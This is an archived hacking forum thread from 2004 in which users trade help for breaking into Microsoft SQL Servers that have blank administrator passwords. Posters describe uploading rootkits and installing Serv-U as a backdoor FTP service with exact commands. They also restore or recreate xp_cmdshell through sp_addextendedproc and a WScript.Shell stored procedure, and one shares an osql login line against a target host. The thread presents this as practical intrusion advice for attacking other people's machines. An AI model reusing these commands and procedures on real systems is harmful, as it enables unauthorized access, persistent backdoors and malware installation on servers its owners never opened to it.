Hi I Was reading The Tut And All... I Wanted To Kno Were I Can Get osql.exe or a program liek that this si my problem i got a successfull login for MSSQL and i upload my rootkit then sqlexec freezes is there anyway that i can prevent this? or anyway of starting my file on that computer thanks
u sure that all the files where uploadded if yes so i use serv-u just type this servudaemon.exe /h servudaemon.exe /i servudaemon.exe /s net start serv-u and connect to the ip with the port in ur servudaemon.ini
bevan_16
Apr 6 2004, 11:51 AM
i usually type this, with the folders in front of course....but whats the /s do? ServUDaemon.exe /h /i
oh, and you can control your ftp from serv-u admin, so you can see who connects to it and that sorta crap
sizza
Apr 6 2004, 03:14 PM
no not serv u i upload my rootkit wit pkunzip and extract or i upload my .exe and then it freezes but dunno if it works and what does
CODE
/h /i /s
do? thanks for the help
sizza
Apr 7 2004, 01:09 PM
btw is there another way i can upload to a sql w/o ftp or tftp??
Killaloop
Apr 7 2004, 01:18 PM
QUOTE (sizza @ Apr 7 2004, 01:09 PM)
btw is there another way i can upload to a sql w/o ftp or tftp??
read the post about New Way To Download , Execute Binary From Cmd
Falcor
Apr 10 2004, 05:59 PM
QUOTE (Killaloop @ Mar 24 2004, 01:05 PM)
there is nothing wrong when sql_no_date is displayed. this is no error this is the reply from the sql server to your command. why? because you are echoing into a file so there is no reply with data to your command. only a 0 for successful which will be interpreted as no_data
just write "type youscript.txt" and you will see everything worked the way it should
awsome man, didnt realize that, its really helping out alot now
Dalrok
Apr 10 2004, 06:51 PM
nice tut great work ill gonna give it a try and ask question i'm stuck
popo0421
Apr 12 2004, 12:30 AM
usually, i will try.... exec sp_dropextendedproc , "xp_cmdshell", then do sp_addextendedproc to add a new xp_cmdshell.
anyway, this is a nice post. thk.
ma4
Apr 15 2004, 02:10 AM
i tested the script and it works... why is it so easy ;) i think you can't secure it completely, there is always a way to break through :(
braini
Apr 16 2004, 01:06 PM
nice tut gonna check it out thnx
realloader
Apr 16 2004, 02:00 PM
Can some one help me? I did all tut in hier , but it doesnt work. Hier u can see: 1-Sqlexec.exe with Apple icon say: SQL_ERROR --------------------------------------------- 2-osql C:\sql>osql.exe -S xxxx.xxx.xxx.xxx -U sa -P "" -i restore.txt 1> 2> 3> Msg 2714, Level 16, State 7, Server CROWN, Procedure sp_addextendedproc , Line 26 [Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database. 1> ------------------------------------------------ 3-SqlBrower CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS --Create WScript.Shell object DECLARE @result int, @OLEResult int, @RunResult int DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
Can't see what the hashes are and the usernames. Anyone got a suggestion? Maybe using something else than Osql?
The Storm
Apr 20 2004, 10:37 AM
QUOTE (realloader @ Apr 16 2004, 02:00 PM)
Can some one help me? I did all tut in hier , but it doesnt work. Hier u can see: 1-Sqlexec.exe with Apple icon say: SQL_ERROR --------------------------------------------- 2-osql C:\sql>osql.exe -S xxxx.xxx.xxx.xxx -U sa -P "" -i restore.txt 1> 2> 3> Msg 2714, Level 16, State 7, Server CROWN, Procedure sp_addextendedproc , Line 26 [Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database. 1> ------------------------------------------------ 3-SqlBrower CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS --Create WScript.Shell object DECLARE @result int, @OLEResult int, @RunResult int DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT IF @OLEResult <> 0 SELECT @result = @OLEResult IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
It come like this: Line 20:Incorrect syntax near '@ShellID' --------------------------------------------------------------- Help me pl.!
u have to drop the old xp_cmdshell!!!! There is still one old that musst be drop i think the comand is
sp_dropprocedur or sp_dropextendedprocedur or sth. like this I`m not really sure!
@TheOther I don`t know this way try out the other ways explained in here!
realloader
Apr 20 2004, 12:11 PM
QUOTE (The Storm @ Apr 20 2004, 10:37 AM)
sp_dropprocedur or sp_dropextendedprocedur or sth. like this I`m not really sure!
how to sp_dropprocedur it? with sqlexec , osql orsqlbrowser?
The Storm
Apr 20 2004, 01:54 PM
QUOTE (realloader @ Apr 20 2004, 12:11 PM)
QUOTE (The Storm @ Apr 20 2004, 10:37 AM)
sp_dropprocedur or sp_dropextendedprocedur or sth. like this I`m not really sure!
how to sp_dropprocedur it? with sqlexec , osql orsqlbrowser?
ok i always use SQLBROWSER ther u only have to type
DROP xp_cmdshell
the its removed
on osql.exe u have to use a txt file on ur pc
////////////////////////////////////////////////////////////////////////////////////////////////////// use master / exec sp_dropextendedproc 'xp_cmdshell' go / //////////////////////////////////////////////////////////////////////////////////////////////////////
hope it works if not try dropextendedproc or procedure or just use the SQLbrowser way it`s the simplest and really works
in SQLEXEC it doesn`t work cause SQLEXEC uses the xpcmdshell and there is no way of self destruction *g* if i`m at home i`m gonna search fior the sp_******* command!
realloader
Apr 20 2004, 04:47 PM
Thank u for reply! however it doesnt work. I open sqlbrowser give thecommand: DROP xp_cmdshell and klick on connect Error pop up: Line 1:Incorrect syntax near 'xp_cmdshell' Other idea?
willywutz
Apr 20 2004, 05:31 PM
in SQLEXEC ( green apple ) this command exec sp_dropextendedproc 'xp_cmdshell' with format %s works fine for me.
Another way Enterprise Manager query analyzer, there you can choose the DB and use the command. This should work in all cases.
but i have no idea wich *.exe we could use 4 executing commands
Eps__Em
Oct 10 2004, 12:50 PM
Thanks for this nice tut. I tried it and it worked . I've got two questions: When I restored the xp_cmdshell, I don't get a Sql Error, but theres no output in SQLExec. Has every SQL Server with a restored xp_cmdshell to be hacked blind?
And the other question is: How can I hack a sql server that's behind a router. The normal way doesn't work. Almost all SQL Servers I find are behind a router . But I know that it's possible.
Thanks for Help!
cya Eps__Em
bipo
Oct 26 2004, 02:01 PM
QUOTE(Eps__Em @ Oct 10 2004, 07:50 AM)
When I restored the xp_cmdshell, I don't get a Sql Error, but theres no output in SQLExec. Has every SQL Server with a restored xp_cmdshell to be hacked blind?
same here.....
thx 4 help!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
.